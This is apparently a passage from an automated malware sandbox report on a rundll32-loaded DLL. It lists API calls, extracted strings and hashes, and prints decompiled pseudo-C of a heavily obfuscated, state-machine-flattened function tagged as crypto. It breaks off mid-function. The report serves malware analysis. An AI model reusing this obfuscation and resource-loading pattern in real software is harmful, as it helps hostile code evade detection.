ShowWindow.USER32(00000000,00000000), ref: 10002005
ShowWindow.USER32(00000000,00000000), ref: 10002009
ShowWindow.USER32(00000000,00000000), ref: 1000200D
ShowWindow.USER32(00000000,00000000), ref: 10002011
ShowWindow.USER32(00000000,00000000), ref: 10002015
ShowWindow.USER32(00000000,00000000), ref: 10002019
ShowWindow.USER32(00000000,00000000), ref: 1000201D
ShowWindow.USER32(00000000,00000000), ref: 10002021
ShowWindow.USER32(00000000,00000000), ref: 10002025
ShowWindow.USER32(00000000,00000000), ref: 10002029
ShowWindow.USER32(00000000,00000000), ref: 1000202D
ShowWindow.USER32(00000000,00000000), ref: 10002031
ShowWindow.USER32(00000000,00000000), ref: 10002035
ShowWindow.USER32(00000000,00000000), ref: 10002039
ShowWindow.USER32(00000000,00000000), ref: 1000203D
ShowWindow.USER32(00000000,00000000), ref: 10002041
ShowWindow.USER32(00000000,00000000), ref: 10002045
ShowWindow.USER32(00000000,00000000), ref: 10002049
ShowWindow.USER32(00000000,00000000), ref: 1000204D
ShowWindow.USER32(00000000,00000000), ref: 10002051
ShowWindow.USER32(00000000,00000000), ref: 10002055
ShowWindow.USER32(00000000,00000000), ref: 10002059
ShowWindow.USER32(00000000,00000000), ref: 1000205D
ShowWindow.USER32(00000000,00000000), ref: 10002061
ShowWindow.USER32(00000000,00000000), ref: 10002065
ShowWindow.USER32(00000000,00000000), ref: 10002069
ShowWindow.USER32(00000000,00000000), ref: 1000206D
ShowWindow.USER32(00000000,00000000), ref: 10002071
ShowWindow.USER32(00000000,00000000), ref: 10002075
ShowWindow.USER32(00000000,00000000), ref: 10002079
ShowWindow.USER32(00000000,00000000), ref: 1000207D
ShowWindow.USER32(00000000,00000000), ref: 10002081
ShowWindow.USER32(00000000,00000000), ref: 10002085
ShowWindow.USER32(00000000,00000000), ref: 10002089
ShowWindow.USER32(00000000,00000000), ref: 1000208D
ShowWindow.USER32(00000000,00000000), ref: 10002091
ShowWindow.USER32(00000000,00000000), ref: 10002095
ShowWindow.USER32(00000000,00000000), ref: 10002099
ShowWindow.USER32(00000000,00000000), ref: 1000209D
ShowWindow.USER32(00000000,00000000), ref: 100020A1
ShowWindow.USER32(00000000,00000000), ref: 100020A5
ShowWindow.USER32(00000000,00000000), ref: 100020A9
ShowWindow.USER32(00000000,00000000), ref: 100020AD
ShowWindow.USER32(00000000,00000000), ref: 100020B1
ShowWindow.USER32(00000000,00000000), ref: 100020B5
ShowWindow.USER32(00000000,00000000), ref: 100020B9
ShowWindow.USER32(00000000,00000000), ref: 100020BD
ShowWindow.USER32(00000000,00000000), ref: 100020C1
ShowWindow.USER32(00000000,00000000), ref: 100020C5
LdrAccessResource.NTDLL(10000000,?,?,?), ref: 100020DB
WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 100020E6
VirtualAlloc.KERNELBASE(00000000,?,00000000,00000000), ref: 10002119
MessageBoxA.USER32 ref: 10002172

Strings

Control_RunDLL, xrefs: 10002159
ntdll.dll, xrefs: 10001EC2
LdrAccessResource, xrefs: 10001EFE
k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc, xrefs: 10002133
LdrFindResource_U, xrefs: 10001EDD, 10001EE4, 10001EEB
MFC42.DLL, xrefs: 10001EAA

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow$AddressAllocLibraryLoadProcVirtual$AccessCurrentFileFindGatherMessageNumaProcessResourceResource_Write_strlen
String ID: Control_RunDLL$LdrAccessResource$LdrFindResource_U$MFC42.DLL$k1>@dY0V<o)afFNz7v68r^Kn6)h)OGcSc$ntdll.dll
API String ID: 1083314109-3402274389
Opcode ID: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction ID: cb1ea1c1361b03dfa0b29133f2aa3901bb47fc6e60d4c354bfdb6088dc7855a5
Opcode Fuzzy Hash: 554e6fde4c1d1f79f28124b122aaa560f5ca8abd828a0db746064c1df19a2dc9
Instruction Fuzzy Hash: 7A9116E1D0022C7EF621ABB28DC9DBF6E6CDE051E8B512817B50A921129E389D05CEF4

Uniqueness

Uniqueness Score: -1.00%

Function 00B22C63, Relevance: 54.9, Strings: 43, Instructions: 1125
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00B22C63() {
				char _v68;
				signed int _v72;
				char _v80;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				unsigned int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				unsigned int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _t1135;
				signed int _t1138;
				signed int _t1140;
				signed int _t1144;
				signed int _t1172;
				void* _t1186;
				signed int _t1199;
				void* _t1213;
				signed int _t1218;
				signed int _t1224;
				signed int _t1257;
				signed int _t1336;
				signed int _t1340;
				signed int _t1348;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1366;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				signed int _t1370;
				signed int _t1371;
				signed int _t1372;
				void* _t1384;
				signed int _t1385;
				void* _t1387;
				void* _t1389;
				void* _t1391;
				void* _t1392;
				void* _t1393;

				_t1387 = (_t1385 & 0xfffffff8) - 0x258;
				_v596 = 0x54d1;
				_t1225 = 0x2a32d0a;
				_t1351 = 0x66;
				_v596 = _v596 / _t1351;
				_t1352 = 0x6b;
				_v596 = _v596 / _t1352;
				_v596 = _v596 >> 4;
				_v596 = _v596 ^ 0x00002830;
				_v416 = 0xcdcb;
				_v416 = _v416 + 0x2116;
				_t1353 = 0x1f;
				_v416 = _v416 * 0x30;
				_v416 = _v416 ^ 0x002c9323;
				_v488 = 0x9982;
				_v488 = _v488 | 0x10c88477;
				_v488 = _v488 ^ 0xa41c88c2;
				_v488 = _v488 / _t1353;
				_v488 = _v488 ^ 0x05d51165;
				_v496 = 0x77c8;
				_v496 = _v496 >> 3;
				_t1354 = 0xa;
				_v496 = _v496 / _t1354;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x0000cb31;
				_v232 = 0x48c9;
				_v232 = _v232 << 0xe;
				_v232 = _v232 ^ 0x12321472;
				_v360 = 0x3c3d;
				_t1218 = 5;
				_v360 = _v360 / _t1218;
				_v360 = _v360 * 0x2f;
				_v360 = _v360 ^ 0x000268e3;
				_v176 = 0x1856;
				_v176 = _v176 * 0x70;
				_v176 = _v176 ^ 0x000ab2a8;
				_v264 = 0xa86e;
				_v264 = _v264 + 0xffff13b3;
				_v264 = _v264 ^ 0xffffefbf;
				_v376 = 0x5423;
				_v376 = _v376 + 0xffffd432;
				_v376 = _v376 | 0x32249576;
				_v376 = _v376 ^ 0x3224c778;
				_v248 = 0xe66f;
				_v248 = _v248 >> 9;
				_v248 = _v248 ^ 0x000023ba;
				_v308 = 0x205b;
				_v308 = _v308 + 0xffff1f5e;
				_v308 = _v308 << 8;
				_v308 = _v308 ^ 0xff3fb884;
				_v484 = 0x592;
				_v484 = _v484 + 0xffffd519;
				_v484 = _v484 | 0x759ff25f;
				_v484 = _v484 + 0x87eb;
				_v484 = _v484 ^ 0x00008574;
				_v168 = 0x6ddb;
				_v168 = _v168 | 0x6e943d07;
				_v168 = _v168 ^ 0x6e944d9a;
				_v200 = 0xd6b0;
				_v200 = _v200 + 0xffff46fa;
				_v200 = _v200 ^ 0x00002650;
				_v452 = 0x246b;
				_v452 = _v452 ^ 0x586b7630;
				_v452 = _v452 << 0xc;
				_v452 = _v452 + 0xd57e;
				_v452 = _v452 ^ 0xb526cd97;
				_v348 = 0xfa69;
				_t1340 = 0x52;
				_t1355 = 0x65;
				_v348 = _v348 * 0x65;
				_v348 = _v348 | 0xab757825;
				_v348 = _v348 ^ 0xab77a96f;
				_v324 = 0xa741;
				_v324 = _v324 ^ 0x4f747397;
				_v324 = _v324 / _t1340;
				_v324 = _v324 ^ 0x00f83cd8;
				_v296 = 0x788d;
				_v296 = _v296 ^ 0x0ef2968d;
				_v296 = _v296 ^ 0x495ddb9a;
				_v296 = _v296 ^ 0x47af2616;
				_v220 = 0xb89f;
				_v220 = _v220 >> 0xb;
				_v220 = _v220 ^ 0x000056af;
				_v520 = 0x12ce;
				_v520 = _v520 + 0xe747;
				_v520 = _v520 << 7;
				_v520 = _v520 | 0x5b07959e;
				_v520 = _v520 ^ 0x5b7fa869;
				_v208 = 0xa95c;
				_v208 = _v208 + 0xffff5ee2;
				_v208 = _v208 ^ 0x00000a9e;
				_v172 = 0xa2eb;
				_v172 = _v172 * 0x79;
				_v172 = _v172 ^ 0x004d63d4;
				_v180 = 0x98a7;
				_v180 = _v180 | 0x8ae8094c;
				_v180 = _v180 ^ 0x8ae8e600;
				_v424 = 0xd5a0;
				_v424 = _v424 << 5;
				_v424 = _v424 / _t1355;
				_v424 = _v424 ^ 0x00007145;
				_v392 = 0x548d;
				_v392 = _v392 + 0xffff9ec2;
				_v392 = _v392 + 0xffffa1fb;
				_v392 = _v392 ^ 0xffff9dba;
				_v340 = 0x6e45;
				_t1356 = 0x16;
				_v340 = _v340 / _t1356;
				_v340 = _v340 + 0xffff4bce;
				_v340 = _v340 ^ 0xffff3c02;
				_v536 = 0xbde4;
				_v536 = _v536 * 0x7f;
				_v536 = _v536 ^ 0x574a5eba;
				_v536 = _v536 << 0xd;
				_v536 = _v536 ^ 0x8d54c30e;
				_v284 = 0x7ef6;
				_v284 = _v284 + 0x9ef0;
				_v284 = _v284 ^ 0x00015c31;
				_v408 = 0xc211;
				_v408 = _v408 ^ 0x3543d7c0;
				_v408 = _v408 * 0x2b;
				_v408 = _v408 ^ 0xf244fbb0;
				_v588 = 0x856b;
				_v588 = _v588 ^ 0xfc1cd259;
				_v588 = _v588 ^ 0x7d294751;
				_v588 = _v588 >> 0xe;
				_v588 = _v588 ^ 0x000240de;
				_v508 = 0x646a;
				_t1357 = 0x1e;
				_v508 = _v508 / _t1357;
				_t1358 = 0x35;
				_v508 = _v508 / _t1358;
				_v508 = _v508 * 0x5a;
				_v508 = _v508 ^ 0x00003cc0;
				_v472 = 0x196b;
				_v472 = _v472 * 0x16;
				_v472 = _v472 + 0x8cdc;
				_v472 = _v472 ^ 0x6344539c;
				_v472 = _v472 ^ 0x6346dd33;
				_v212 = 0xb705;
				_v212 = _v212 << 7;
				_v212 = _v212 ^ 0x005bff43;
				_v312 = 0xb48f;
				_v312 = _v312 + 0xffff701f;
				_v312 = _v312 >> 0xa;
				_v312 = _v312 ^ 0x00001302;
				_v480 = 0xed6e;
				_v480 = _v480 | 0x6be3eced;
				_v480 = _v480 + 0x4979;
				_v480 = _v480 ^ 0x6be47f6f;
				_v204 = 0xd35b;
				_v204 = _v204 >> 8;
				_v204 = _v204 ^ 0x00000622;
				_v456 = 0xd2fa;
				_v456 = _v456 << 3;
				_v456 = _v456 + 0xffffd4b1;
				_v456 = _v456 << 4;
				_v456 = _v456 ^ 0x0066f5d7;
				_v464 = 0x5ee1;
				_v464 = _v464 >> 9;
				_v464 = _v464 | 0xf1defbea;
				_v464 = _v464 ^ 0xf1de88d3;
				_v304 = 0x5962;
				_v304 = _v304 ^ 0xf5db8de9;
				_v304 = _v304 | 0xcdcbde78;
				_v304 = _v304 ^ 0xfddba732;
				_v196 = 0xf258;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x007971a7;
				_v448 = 0xfcbd;
				_v448 = _v448 | 0x39b7afc5;
				_v448 = _v448 * 0x70;
				_v448 = _v448 | 0x0e40c0bc;
				_v448 = _v448 ^ 0x4e7fac25;
				_v412 = 0x82bf;
				_v412 = _v412 | 0xb02f6e2d;
				_v412 = _v412 + 0xffff8626;
				_v412 = _v412 ^ 0xb02f1cac;
				_v396 = 0xa4bf;
				_v396 = _v396 ^ 0xb063c23f;
				_v396 = _v396 >> 0xf;
				_v396 = _v396 ^ 0x00011327;
				_v592 = 0x3de9;
				_v592 = _v592 + 0xffff189b;
				_v592 = _v592 * 0x3e;
				_v592 = _v592 + 0xffff8de2;
				_v592 = _v592 ^ 0xffd6d64a;
				_v404 = 0x86b0;
				_v404 = _v404 >> 5;
				_v404 = _v404 | 0x66bae114;
				_v404 = _v404 ^ 0x66bacebe;
				_v268 = 0x5937;
				_v268 = _v268 + 0xb57c;
				_v268 = _v268 ^ 0x00015145;
				_v280 = 0x9a1f;
				_v280 = _v280 + 0xffffa2eb;
				_v280 = _v280 ^ 0x000041dd;
				_v572 = 0xebd0;
				_v572 = _v572 ^ 0xedb0bf00;
				_t1359 = 0x32;
				_v572 = _v572 / _t1359;
				_v572 = _v572 << 1;
				_v572 = _v572 ^ 0x09819433;
				_v468 = 0x3364;
				_v468 = _v468 + 0xffff353c;
				_v468 = _v468 + 0x9f63;
				_v468 = _v468 | 0x0336228b;
				_v468 = _v468 ^ 0x0336362e;
				_v580 = 0x8c54;
				_v580 = _v580 | 0xf7fe7ffd;
				_v580 = _v580 << 2;
				_v580 = _v580 ^ 0xdffb9211;
				_v400 = 0xc44;
				_v400 = _v400 | 0x703220aa;
				_v400 = _v400 + 0x556b;
				_v400 = _v400 ^ 0x70328daf;
				_v316 = 0xc625;
				_t1360 = 0x2f;
				_v316 = _v316 / _t1360;
				_v316 = _v316 | 0xad0f9139;
				_v316 = _v316 ^ 0xad0f9a77;
				_v352 = 0x3bfc;
				_v352 = _v352 ^ 0x3d91e4fd;
				_v352 = _v352 << 4;
				_v352 = _v352 ^ 0xd91d9102;
				_v188 = 0xbf9d;
				_v188 = _v188 ^ 0xeb169de8;
				_v188 = _v188 ^ 0xeb160ae0;
				_v272 = 0xf610;
				_v272 = _v272 >> 0xc;
				_v272 = _v272 ^ 0x000001f5;
				_v500 = 0xa952;
				_v500 = _v500 ^ 0x762f8db9;
				_t1361 = 0x7b;
				_v500 = _v500 * 0x6e;
				_v500 = _v500 | 0x4a766c6e;
				_v500 = _v500 ^ 0xca77b322;
				_v420 = 0xb3ce;
				_v420 = _v420 | 0x5d2bbb9b;
				_v420 = _v420 + 0x97cf;
				_v420 = _v420 ^ 0x5d2c523b;
				_v276 = 0x9f6f;
				_v276 = _v276 + 0x6bc4;
				_v276 = _v276 ^ 0x00010aa4;
				_v504 = 0x2102;
				_v504 = _v504 >> 7;
				_v504 = _v504 + 0xffff0b4b;
				_v504 = _v504 << 4;
				_v504 = _v504 ^ 0xfff0cd66;
				_v320 = 0xeb7e;
				_v320 = _v320 / _t1361;
				_v320 = _v320 << 0xc;
				_v320 = _v320 ^ 0x001ed973;
				_v512 = 0x61aa;
				_v512 = _v512 | 0xfdc9feff;
				_t1362 = 0x42;
				_v512 = _v512 / _t1362;
				_v512 = _v512 ^ 0x03d81aae;
				_v540 = 0x929f;
				_t1363 = 3;
				_v540 = _v540 * 0x59;
				_v540 = _v540 ^ 0xd582cfd5;
				_v540 = _v540 + 0xffff6c6f;
				_v540 = _v540 ^ 0xd5af900c;
				_v332 = 0xd4e0;
				_v332 = _v332 | 0xf04e42e2;
				_v332 = _v332 ^ 0xcda3b68f;
				_v332 = _v332 ^ 0x3ded4bfa;
				_v192 = 0xb136;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x00000257;
				_v460 = 0xb4b8;
				_v460 = _v460 + 0xffff8599;
				_v460 = _v460 / _t1363;
				_v460 = _v460 + 0x6faa;
				_v460 = _v460 ^ 0x0000d8b1;
				_v548 = 0x6ab8;
				_t1364 = 0x7c;
				_v548 = _v548 * 0x71;
				_v548 = _v548 / _t1364;
				_v548 = _v548 << 4;
				_v548 = _v548 ^ 0x00063121;
				_v260 = 0x579;
				_v260 = _v260 >> 0xd;
				_v260 = _v260 ^ 0x00001a36;
				_v380 = 0x5d49;
				_t1365 = 0x3a;
				_v380 = _v380 * 0x2a;
				_v380 = _v380 << 0xf;
				_v380 = _v380 ^ 0xa6fd05f8;
				_v584 = 0x9575;
				_v584 = _v584 << 0xe;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 >> 9;
				_v584 = _v584 ^ 0x00001953;
				_v388 = 0x71ed;
				_v388 = _v388 | 0xfa0f4c1a;
				_v388 = _v388 * 0x21;
				_v388 = _v388 ^ 0x3bff2db3;
				_v576 = 0x40ac;
				_v576 = _v576 ^ 0x72872e3c;
				_v576 = _v576 >> 3;
				_v576 = _v576 >> 6;
				_v576 = _v576 ^ 0x00395cc8;
				_v356 = 0x9a14;
				_v356 = _v356 * 5;
				_v356 = _v356 / _t1365;
				_v356 = _v356 ^ 0x00000d15;
				_v364 = 0x97d4;
				_v364 = _v364 + 0xffff1281;
				_v364 = _v364 << 0xd;
				_v364 = _v364 ^ 0xf54ac276;
				_v568 = 0x9f15;
				_v568 = _v568 + 0xffff08f5;
				_v568 = _v568 * 0x54;
				_v568 = _v568 + 0x8411;
				_v568 = _v568 ^ 0xffe3bf59;
				_v372 = 0xb5ac;
				_v372 = _v372 | 0xef292143;
				_v372 = _v372 << 0xc;
				_v372 = _v372 ^ 0x9b5ed191;
				_v560 = 0xc079;
				_v560 = _v560 << 6;
				_v560 = _v560 | 0x75378a54;
				_v560 = _v560 + 0xffff0fb6;
				_v560 = _v560 ^ 0x7536a745;
				_v252 = 0xffdd;
				_v252 = _v252 ^ 0x94fd4b64;
				_v252 = _v252 ^ 0x94fd9346;
				_v344 = 0x2817;
				_v344 = _v344 + 0xffffb9ce;
				_v344 = _v344 >> 5;
				_v344 = _v344 ^ 0x07ffc707;
				_v544 = 0xc4c3;
				_v544 = _v544 << 4;
				_v544 = _v544 | 0xf37ee84d;
				_v544 = _v544 >> 9;
				_v544 = _v544 ^ 0x0079cb8a;
				_v244 = 0xbe83;
				_v244 = _v244 << 9;
				_v244 = _v244 ^ 0x017d70fa;
				_v552 = 0x87b1;
				_v552 = _v552 + 0xe2ec;
				_v552 = _v552 + 0xffff8757;
				_t1366 = 0x57;
				_v552 = _v552 / _t1366;
				_v552 = _v552 ^ 0x00000cf8;
				_v524 = 0x9ee8;
				_v524 = _v524 >> 0xc;
				_v524 = _v524 + 0xffffea20;
				_v524 = _v524 + 0x67c2;
				_v524 = _v524 ^ 0x0000257d;
				_v240 = 0x3e44;
				_t1367 = 0x4e;
				_v240 = _v240 * 0x26;
				_v240 = _v240 ^ 0x000944b9;
				_v184 = 0xb17e;
				_v184 = _v184 + 0xc83;
				_v184 = _v184 ^ 0x00008468;
				_v428 = 0x2247;
				_v428 = _v428 >> 6;
				_v428 = _v428 | 0xbf36a58a;
				_v428 = _v428 ^ 0xbf36942e;
				_v492 = 0xaf88;
				_v492 = _v492 | 0x489e17bf;
				_v492 = _v492 / _t1367;
				_t1368 = 0x59;
				_v492 = _v492 / _t1368;
				_v492 = _v492 ^ 0x00028cc4;
				_v236 = 0x579b;
				_v236 = _v236 | 0x958cbadb;
				_v236 = _v236 ^ 0x958cb114;
				_v528 = 0x596e;
				_t1369 = 0x25;
				_v528 = _v528 / _t1369;
				_v528 = _v528 + 0xffff0f20;
				_v528 = _v528 * 0x71;
				_v528 = _v528 ^ 0xff96cb88;
				_v384 = 0xdb4f;
				_v384 = _v384 / _t1340;
				_v384 = _v384 ^ 0x047c7efe;
				_v384 = _v384 ^ 0x047c6269;
				_v256 = 0x2cf1;
				_v256 = _v256 | 0x808b3cca;
				_v256 = _v256 ^ 0x808b1c76;
				_v300 = 0x3901;
				_t1370 = 0x6d;
				_v300 = _v300 * 0xa;
				_v300 = _v300 >> 6;
				_v300 = _v300 ^ 0x0000212b;
				_v368 = 0x796e;
				_v368 = _v368 * 0xc;
				_v368 = _v368 * 0x3e;
				_v368 = _v368 ^ 0x0160b691;
				_v444 = 0xa0b9;
				_v444 = _v444 | 0x9ca1dfa8;
				_v444 = _v444 / _t1370;
				_v444 = _v444 * 0x63;
				_v444 = _v444 ^ 0x8e437e2f;
				_v532 = 0x8c65;
				_v532 = _v532 * 0x56;
				_v532 = _v532 << 0xa;
				_v532 = _v532 * 0x21;
				_v532 = _v532 ^ 0x519e8d1f;
				_v556 = 0x4a7f;
				_v556 = _v556 << 0xf;
				_v556 = _v556 + 0xa5c2;
				_v556 = _v556 | 0xa1707f4f;
				_v556 = _v556 ^ 0xa5705fb9;
				_v436 = 0x3fda;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 + 0x1364;
				_v436 = _v436 ^ 0xe1573554;
				_v436 = _v436 ^ 0xe158f097;
				_v564 = 0x6043;
				_v564 = _v564 | 0xb689377f;
				_v564 = _v564 >> 8;
				_v564 = _v564 ^ 0x2a62422c;
				_v564 = _v564 ^ 0x2ad4e10a;
				_v328 = 0x5c6e;
				_v328 = _v328 ^ 0x42ae754b;
				_v328 = _v328 + 0xbaa3;
				_v328 = _v328 ^ 0x42aeef53;
				_v228 = 0xef63;
				_v228 = _v228 >> 0xe;
				_v228 = _v228 ^ 0x00001997;
				_v336 = 0x5044;
				_v336 = _v336 >> 0xf;
				_v336 = _v336 + 0xffffb35b;
				_v336 = _v336 ^ 0xffffef5d;
				_v440 = 0x7004;
				_v440 = _v440 * 0x7e;
				_v440 = _v440 * 0x13;
				_v440 = _v440 << 0x10;
				_v440 = _v440 ^ 0x85685bd2;
				_v164 = 0x75ea;
				_v164 = _v164 << 0xb;
				_v164 = _v164 ^ 0x03af40f2;
				_v224 = 0xc6cf;
				_v224 = _v224 << 9;
				_v224 = _v224 ^ 0x018dae64;
				_v160 = 0xb450;
				_t1371 = 0x38;
				_v160 = _v160 / _t1371;
				_v160 = _v160 ^ 0x00003b29;
				_v476 = 0xddbc;
				_v476 = _v476 ^ 0xc2407c95;
				_v476 = _v476 + 0xd5a3;
				_v476 = _v476 + 0x8192;
				_v476 = _v476 ^ 0xc241f0f2;
				_v216 = 0xdff2;
				_t1372 = 0x2c;
				_v216 = _v216 * 0x1c;
				_v216 = _v216 ^ 0x00187743;
				_v516 = 0x400b;
				_v516 = _v516 / _t1218;
				_v516 = _v516 + 0xc836;
				_v516 = _v516 >> 0xa;
				_v516 = _v516 ^ 0x00004f08;
				_v292 = 0xdc4e;
				_v292 = _v292 * 0x16;
				_v292 = _v292 * 0x7f;
				_v292 = _v292 ^ 0x09643e15;
				_v600 = 0x4d46;
				_v600 = _v600 + 0xffff0db8;
				_v600 = _v600 + 0x84f3;
				_v600 = _v600 + 0xc039;
				_v600 = _v600 ^ 0x0000d5ed;
				_v432 = 0x8bd1;
				_v432 = _v432 << 0xc;
				_v432 = _v432 + 0x8a22;
				_v432 = _v432 / _t1372;
				_v432 = _v432 ^ 0x003284c4;
				_v288 = 0x245c;
				_v288 = _v288 | 0x526859ae;
				_v288 = _v288 * 0xc;
				_v288 = _v288 ^ 0xdce5b0ef;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t1391 = _t1225 - 0x1bd1caec;
							if(_t1391 <= 0) {
							}
							L3:
							if(_t1391 == 0) {
								__eflags = E00B302C3();
								if(__eflags == 0) {
									_t1135 = E00B27903();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1135 & 0x0209e55e) + 0x3544b2a;
									while(1) {
										L2:
										_t1391 = _t1225 - 0x1bd1caec;
										if(_t1391 <= 0) {
										}
										goto L3;
									}
								}
								_t1144 = E00B27903();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1144 & 0x03449ef9;
								L32:
								_t1225 = _t1257 + 0xda99535;
								while(1) {
									L2:
									_t1391 = _t1225 - 0x1bd1caec;
									if(_t1391 <= 0) {
									}
									goto L54;
								}
								goto L3;
							}
							_t1392 = _t1225 - 0x10ee342e;
							if(_t1392 > 0) {
								__eflags = _t1225 - 0x15603e6b;
								if(__eflags > 0) {
									__eflags = _t1225 - 0x159448ba;
									if(_t1225 == 0x159448ba) {
										E00B2C562(_v540,  &_v80, _v332, _v192);
										_t1225 = 0x17799f6a;
										continue;
									}
									__eflags = _t1225 - 0x1653011b;
									if(_t1225 == 0x1653011b) {
										E00B2F536(_v384, _v256, _v300, _v140);
										_t1225 = 0x21caf663;
										continue;
									}
									__eflags = _t1225 - 0x17799f6a;
									if(_t1225 == 0x17799f6a) {
										_t1138 = E00B29A37( &_v112,  &_v132, _v460, _v548);
										asm("sbb ecx, ecx");
										_t1225 = ( ~_t1138 & 0x1d975e2e) + 0x7ff6f9b;
										continue;
									}
									__eflags = _t1225 - 0x1b19f75b;
									if(_t1225 != 0x1b19f75b) {
										break;
									}
									_t1144 = E00B373AC();
									asm("sbb ecx, ecx");
									_t1225 = ( ~_t1144 & 0x1b44a5c9) + 0x1bd1caec;
									continue;
								}
								if(__eflags == 0) {
									_t1144 = E00B2F444(_t1225);
									L112:
									return _t1144;
								}
								__eflags = _t1225 - 0x10f69b27;
								if(_t1225 == 0x10f69b27) {
									_t1144 = E00B3AB96();
									_t1225 = 0x326a8235;
									continue;
								}
								__eflags = _t1225 - 0x11454f34;
								if(_t1225 == 0x11454f34) {
									_t1144 = E00B2D7EB();
									_t1225 = 0x356cf65c;
									continue;
								}
								__eflags = _t1225 - 0x11dfa862;
								if(__eflags == 0) {
									_t1225 = 0x376e2cde;
									continue;
								}
								__eflags = _t1225 - 0x13c96655;
								if(_t1225 != 0x13c96655) {
									break;
								}
								_t1144 = E00B262A3();
								goto L112;
							}
							if(_t1392 == 0) {
								_t1140 = E00B2153C();
								asm("sbb ecx, ecx");
								_t1257 =  ~_t1140 & 0x061fd120;
								__eflags = _t1257;
								goto L32;
							}
							_t1393 = _t1225 - 0x55e3088;
							if(_t1393 > 0) {
								__eflags = _t1225 - 0x7ff6f9b;
								if(_t1225 == 0x7ff6f9b) {
									_t1336 = _v436;
									E00B2F536(_v556, _t1336, _v564, _v80);
									_t1225 = 0x3140af28;
									continue;
								}
								__eflags = _t1225 - 0xb356ed5;
								if(_t1225 == 0xb356ed5) {
									_t1144 = E00B2C2E2();
									_v104 = _t1144;
									_t1225 = 0x288da576;
									continue;
								}
								__eflags = _t1225 - 0xd8c7d27;
								if(_t1225 == 0xd8c7d27) {
									_push( &_v68);
									_t1336 = _v572;
									_t1144 = E00B32349(_v280, _t1336, _v468, _v580, _t1225);
									_t1387 = _t1387 + 0x10;
									__eflags = _t1144;
									if(__eflags == 0) {
										L28:
										_t1225 = 0x15603e6b;
										continue;
									}
									_t1336 = _v316;
									_v112 =  &_v68;
									_t1144 = E00B2DFE2(_v400, _t1336,  &_v68);
									_v108 = _t1144;
									_t1225 = 0x2267098;
									continue;
								}
								__eflags = _t1225 - 0xda99535;
								if(_t1225 != 0xda99535) {
									break;
								}
								E00B37D03();
								_t1144 = E00B28317();
								L25:
								_t1225 = 0x23233137;
								continue;
							}
							if(_t1393 == 0) {
								_t1144 = E00B363C1();
								_t1225 = 0x3544b2a;
								continue;
							}
							if(_t1225 == 0x13a2b08) {
								_t1225 = 0x282d346f;
								continue;
							}
							if(_t1225 == 0x2267098) {
								_t1144 = E00B3611C();
								_v72 = _t1144;
								_t1225 = 0xb356ed5;
								continue;
							}
							if(_t1225 == 0x2a32d0a) {
								_t1225 = 0x34a6f88;
								continue;
							}
							if(_t1225 == 0x34a6f88) {
